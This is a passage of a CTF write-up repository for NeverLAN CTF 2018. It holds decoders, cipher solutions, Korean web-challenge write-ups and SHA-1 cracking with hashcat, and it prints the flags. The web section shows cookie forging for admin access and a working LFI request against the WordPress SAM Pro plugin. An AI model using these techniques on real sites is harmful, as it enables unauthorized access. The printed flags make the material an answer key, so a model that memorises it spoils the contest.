90 | }
91 | *length = j-blank;
92 | }
93 |
94 | int main(void){
95 | int src_size, x;
96 | struct timespec start,end;
97 | char *result;
98 | FILE *read, *output;
99 |
100 | printf("NeverLAN CTF - That's a big file\n");
101 | printf("base64 decoder Edited by munsiwoo\n");
102 |
103 | read = fopen("ThatsBig.txt", "r");
104 | fread( str, 1, 798281684, read);
105 | fclose(read);
106 |
107 | src_size = strlen(str);
108 | result = (char *)malloc(3 * (src_size / 4));
109 | base64d(str, result, &src_size);
110 | strcpy(tmp, result);
111 | free(result);
112 |
113 | for(x=0; x<20; ++x) {
114 | src_size = strlen(tmp);
115 | result = (char *)malloc(3 * (src_size / 4));
116 | base64d(tmp, result, &src_size);
117 | strcpy(tmp, result);
118 | free(result);
119 |
120 | printf("%d,", x);
121 | }
122 |
123 | src_size = strlen(tmp);
124 | result = (char *)malloc(3 * (src_size / 4));
125 | base64d(tmp, result, &src_size);
126 | strcpy(tmp, result);
127 |
128 | printf("%d\n", x);
129 | printf("%s\n", result);
130 |
131 | output = fopen("Output.txt", "wb");
132 | fputs(result, output);
133 | fclose(output);
134 |
135 | free(result);
136 |
137 | return 0;
138 | }
139 |
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/That's-a-big-file/decoder.py:
--------------------------------------------------------------------------------
1 | from base64 import decodestring as base64decode
2 |
3 | loadfile = open("Output.txt", 'r')
4 | readfile = loadfile.read()
5 | # made by munsiwoo
6 |
7 | tmp = base64decode(str(readfile).encode()).decode()
8 | result = tmp
9 |
10 | for x in range(36) :
11 | tmp = base64decode(str(result).encode()).decode()
12 | result = tmp
13 |
14 | print(result)
15 |
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/dot-dot-dashish/README.md:
--------------------------------------------------------------------------------
1 | # dot-dot-dashish (300)
2 |
3 | ~~~
4 | https://www.dcode.fr/morbit-cipher
5 |
6 | 97316965853979963985499179367294639394818957686961793985758977285755179717668146351797581542771573123768175949171639399579635857539139371589197916944146353461537149577161797698979
7 |
8 | KEYWORD OF 9 LETTERS : NEVERLANC
9 |
10 |
11 | EVEN MORSE CODE HAD ENCRYPTION THROUGH OUT HISTORY HUMAN HAVE LOVED SECRETS YOUR FLAG IS ENCRYPTALLTHETHINGS
12 |
13 |
14 | FLAG IS ENCRYPTALLTHETHINGS
15 |
16 | flag{encryptallthethings}
17 | ~~~
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/InterWeb/README.md:
--------------------------------------------------------------------------------
1 | # Interweb Write-ups (1100pt)
2 |
3 | ### ajax_not_soap (100)
4 | ~~~
5 | webhooks/get_username.php 로 이동하면 MrClean이란 username을 알려준다.
6 | MrClean을 webhooks/get_pass.php?username=MrClean 이렇게 get_pass.php에 대입해주면
7 | flag가 나온다. flag{hj38dsjk324nkeasd9}
8 | ~~~
9 |
10 | ### ajax_not_borax (200)
11 | ~~~
12 | webhooks/get_username.php 로 이동하면 c5644ca91d1307779ed493c4dedfdcb7 라는 해시값이 나온다.
13 | 이걸 hashkiller에 놓고 돌리면 tideade가 나오고 webhooks/get_pass.php?username=tideade 이렇게 대입해주면
14 | base64로 인코딩된 flag가 나온다. ZmxhZ3tzZDkwSjBkbkxLSjFsczlISmVkfQ==
15 | flag{sd90J0dnLKJ1ls9HJed}
16 | ~~~
17 |
18 | ### the_red_or_blue_pill (100)
19 | ~~~
20 | 접속하면 red pill하고 blue pill을 선택할 수 있다.
21 | red pill을 누르면 ?red 파라미터가, blue pill을 먹으면 ?blue 파라미터가 생기는데
22 | 밑에 "red pill하고 blue pill을 동시에 먹으면 안되냐?"라는 지문을 보고
23 | red 파라미터와 blue 파라미터를 동시에 주었더니 flag가 나왔다.
24 | /?red&blue
25 | # Well you chose option 3 which clearly was stated not to do. Good job! :)
26 | # flag{breaking_the_matrix...I_like_it!}
27 | ~~~
28 |
29 | ### tik-tik-boom (300)
30 | ~~~
31 | 접속에서 html을 보면 username and password did not match: admin hahahaN0one1s3verGett1ngTh1sp@ssw0rd
32 | 라는 문구가 눈에 띈다, cookie에 username, password라는 cookie가 있는데
33 | 각각 username=admin;password=hahahaN0one1s3verGett1ngTh1sp@ssw0rd; 이렇게 바꿔주면 flag가 나온다.
34 | 단 *시 23분 59초에 새로고침해야 flag가 나온다.
35 | ~~~
36 |
37 | ### Das_blog (200)
38 | ~~~
39 | 로그인 페이지에서 주석처리된 테스트 계정을 확인할 수 있다.
40 | 이 테스트 계정으로 로그인하면 permissions=user라는 쿠키 세션이 생기는데
41 | permissions을 admin으로 바꾸고 최상위 디렉토리로 이동하면 flag를 얻을 수 있다.
42 |
43 | flag{C00ki3s_c4n_b33_ch4ng3d_?}
44 | ~~~
45 |
46 | ### What the LFI? (200)
47 | ~~~
48 | 워드프레스에서 발생하는 LFI 취약점을 다루는 문제다.
49 | wpscan 도구를 사용해서 SAM Pro에서 발생하는 LFI 존재를 알 수 있었고
50 | "wordpress SAM Pro LFI" 키워드로 검색해보니
51 | /wp-content/plugins/sam-pro-free/sam-pro-ajax-admin.php 에서 LFI가 발생한다는 것을 알았다.
52 |
53 | ref: https://www.pluginvulnerabilities.com/2016/10/28/local-file-inclusion-lfi-vulnerability-in-sam-pro-free-edition/
54 |
55 | 위 게시물을 확인할 수 있었고 해당 게시물을 토대로 공격하여 flag를 획득했다.
56 | http://54.201.224.15:14099/wp-content/plugins/sam-pro-free/sam-pro-ajax-admin.php?action=NA&wap=L3Zhci93d3cvYmxhaC5waHA=
57 |
58 | flag{dont_include_files_derived_from_user_input_kthx_bai}
59 | ~~~
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/InterWeb/das-blog.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/InterWeb/das-blog.png
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/InterWeb/wpscan.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/InterWeb/wpscan.png
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/Ending!=Hash/wireshark(flag).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/Ending!=Hash/wireshark(flag).png
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/README.md:
--------------------------------------------------------------------------------
1 | # SHA-1 (200)
2 |
3 | ~~~
4 | > ./hashcat32.exe hash.txt -a 3 -m 100 ?d?l?l?u?l?l?l?l
5 | > ./hashcat32.exe hash.txt -a 3 -m 100 ?d?l?l?u?l?l?l?l --show
6 | ~~~
7 |
8 | 05d3693c0781227771b97a9e3cf972d44c2d4439:1stOrder
9 |
10 | flag{1stOrder}
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/description.txt:
--------------------------------------------------------------------------------
1 | Name: SHA-1
2 |
3 | Author: bashninja
4 |
5 | Description: We found a password that might be useful, but it's currently hashed. Can you crack the hash?
6 |
7 | We know the first character is a digit, but that's it.
8 |
9 | 05d3693c0781227771b97a9e3cf972d44c2d4439
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed(python-script)/__pycache__/brute.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed(python-script)/__pycache__/brute.cpython-36.pyc
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed(python-script)/brute.py:
--------------------------------------------------------------------------------
1 | from hashlib import sha1
2 |
3 |
4 | shashasha = '05d3693c0781227771b97a9e3cf972d44c2d4439'
5 | # hash = sha1([0-9][a-z0-9][a-z0-9][A-Z][a-z0-9])
6 |
7 | table = '0123456789'
8 | table += 'abcdefghijklmnopqrstuvwxyz'
9 | table += 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
10 |
11 |
12 | for a in table[:10] :
13 | for b in table[:36] :
14 | for c in table[:36] :
15 | for d in table[36:] :
16 | compare = str(sha1((a+b+c+d).encode()).hexdigest())
17 | #print(compare+" : "+str(a+b+c+d+e+f+g))
18 | if(compare == shashasha) :
19 | print(a+b+c+d)
20 | break
21 |
22 |
23 |
24 |
25 | """
26 | print(hashlib.sha1(b"0bcA").hexdigest())
27 | print(hashlib.sha1(a.encode()).hexdigest())
28 | print(hashlib.sha1(b"1bcB").hexdigest())
29 | print(hashlib.sha1(b"2bcC").hexdigest())
30 | print(hashlib.sha1(b"3bcD").hexdigest())
31 | print(hashlib.sha1(b"3baD").hexdigest())
32 | print(hashlib.sha1(b"3b3D").hexdigest())
33 | print(hashlib.sha1(b"4bcE").hexdigest())
34 | print(hashlib.sha1(b"5bcF").hexdigest())
35 | """
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed_bruteforce/__pycache__/brute.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed_bruteforce/__pycache__/brute.cpython-36.pyc
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed_bruteforce/brute.py:
--------------------------------------------------------------------------------
1 | from hashlib import sha1
2 |
3 |
4 | shashasha = '05d3693c0781227771b97a9e3cf972d44c2d4439'
5 | # hash = sha1([0-9][a-z0-9][a-z0-9][A-Z][a-z0-9])
6 |
7 | table = '0123456789'
8 | table += 'abcdefghijklmnopqrstuvwxyz'
9 | table += 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
10 |
11 |
12 | for a in table[:10] :
13 | for b in table[:36] :
14 | for c in table[:36] :
15 | for d in table[36:] :
16 | compare = str(sha1((a+b+c+d).encode()).hexdigest())
17 | #print(compare+" : "+str(a+b+c+d+e+f+g))
18 | if(compare == shashasha) :
19 | print(a+b+c+d)
20 | break
21 |
22 |
23 |
24 |
25 | """
26 | print(hashlib.sha1(b"0bcA").hexdigest())
27 | print(hashlib.sha1(a.encode()).hexdigest())
28 | print(hashlib.sha1(b"1bcB").hexdigest())
29 | print(hashlib.sha1(b"2bcC").hexdigest())
30 | print(hashlib.sha1(b"3bcD").hexdigest())
31 | print(hashlib.sha1(b"3baD").hexdigest())
32 | print(hashlib.sha1(b"3b3D").hexdigest())
33 | print(hashlib.sha1(b"4bcE").hexdigest())
34 | print(hashlib.sha1(b"5bcF").hexdigest())
35 | """
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hash.txt:
--------------------------------------------------------------------------------
1 | 05d3693c0781227771b97a9e3cf972d44c2d4439
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_full.charset:
--------------------------------------------------------------------------------
1 | 01020407080b0d0e10131516191a1c1f20232526292a2c2f31323437383b3d3e40434546494a4c4f51525457585b5d5e61626467686b6d6e70737576797a7c7f80838586898a8c8f91929497989b9d9ea1a2a4a7a8abadaeb0b3b5b6b9babcbfc1c2c4c7c8cbcdced0d3d5d6d9dadcdfe0e3e5e6e9eaeceff1f2f4f7f8fbfdfe
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/DES_alpha.charset:
--------------------------------------------------------------------------------
1 | abadaebabcbfcbcdcedadcdfeaeceffbfdfe
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/DES_numeral.charset:
--------------------------------------------------------------------------------
1 | 0102040708101315161920232526293132343738404345464951525457586162646768707375767980838586899192949798
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_0.charset:
--------------------------------------------------------------------------------
1 | 01020407080b0d0e
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_1.charset:
--------------------------------------------------------------------------------
1 | 10131516191a1c1f
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_2.charset:
--------------------------------------------------------------------------------
1 | 20232526292a2c2f
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_3.charset:
--------------------------------------------------------------------------------
1 | 31323437383b3d3e
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_4.charset:
--------------------------------------------------------------------------------
1 | 40434546494a4c4f
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_5.charset:
--------------------------------------------------------------------------------
1 | 51525457585b5d5e
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_6.charset:
--------------------------------------------------------------------------------
1 | 61626467686b6d6e
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_7.charset:
--------------------------------------------------------------------------------
1 | 70737576797a7c7f
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_8.charset:
--------------------------------------------------------------------------------
1 | 80838586898a8c8f
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_9.charset:
--------------------------------------------------------------------------------
1 | 91929497989b9d9e
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_A.charset:
--------------------------------------------------------------------------------
1 | a1a2a4a7a8abadae
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_B.charset:
--------------------------------------------------------------------------------
1 | b0b3b5b6b9babcbf
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_C.charset:
--------------------------------------------------------------------------------
1 | c1c2c4c7c8cbcdce
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_D.charset:
--------------------------------------------------------------------------------
1 | d0d3d5d6d9dadcdf
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_E.charset:
--------------------------------------------------------------------------------
1 | e0e3e5e6e9eaecef
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_F.charset:
--------------------------------------------------------------------------------
1 | f1f2f4f7f8fbfdfe
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Bulgarian.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Bulgarian.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Castilian.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Castilian.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Catalan.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Catalan.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/English.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/English.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/French.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/French.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/German.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/German.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Greek.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Greek.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/GreekPolytonic.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/GreekPolytonic.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Italian.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Italian.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Lithuanian.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Lithuanian.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Polish.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Polish.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Portuguese.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Portuguese.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Russian.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Russian.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Slovak.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Slovak.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Spanish.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Spanish.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_ISO-8859-1-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_ISO-8859-15-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_cp1252-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_ISO-8859-1-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_ISO-8859-15-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_cp1252-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-1-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-15-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-16-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-16-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_cp1252-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_ISO-8859-1-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_ISO-8859-15-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_cp1252-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Greek/el_ISO-8859-7-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Greek/el_ISO-8859-7-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Greek/el_cp1253-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Greek/el_cp1253-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_ISO-8859-1-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_ISO-8859-15-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_cp1252-special.hcchr:
--------------------------------------------------------------------------------
